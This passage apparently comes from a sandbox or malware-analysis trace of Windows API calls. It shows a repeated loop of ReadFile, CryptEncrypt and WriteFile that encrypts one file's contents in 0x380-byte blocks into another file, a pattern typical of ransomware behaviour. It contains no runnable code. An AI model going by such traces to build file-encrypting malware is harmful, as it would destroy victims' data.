pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.986] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.986] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.986] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.986] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.986] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.986] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.986] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.986] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.986] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.986] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.986] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.987] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.987] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.991] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.991] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.991] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.991] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.991] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.991] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.992] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.992] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.992] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.992] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.992] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.992] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.992] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.992] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.992] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.993] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.993] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.993] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.993] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.993] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.993] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.993] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.993] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.993] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.993] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.993] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.993] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.993] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.993] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.994] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.994] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.994] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.994] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.994] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.994] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.994] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.994] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.994] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.994] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.994] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.994] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.994] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.994] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.994] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.995] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.995] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.995] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.995] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.995] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.995] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.995] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.995] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.995] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.995] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.995] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.995] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.996] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.996] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.996] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.996] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.996] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.996] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.996] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.996] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.996] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.996] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.996] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.996] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.996] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.996] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.997] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.997] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.997] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.997] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.997] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.997] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.997] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.997] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.997] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.997] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.997] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.997] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.997] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, 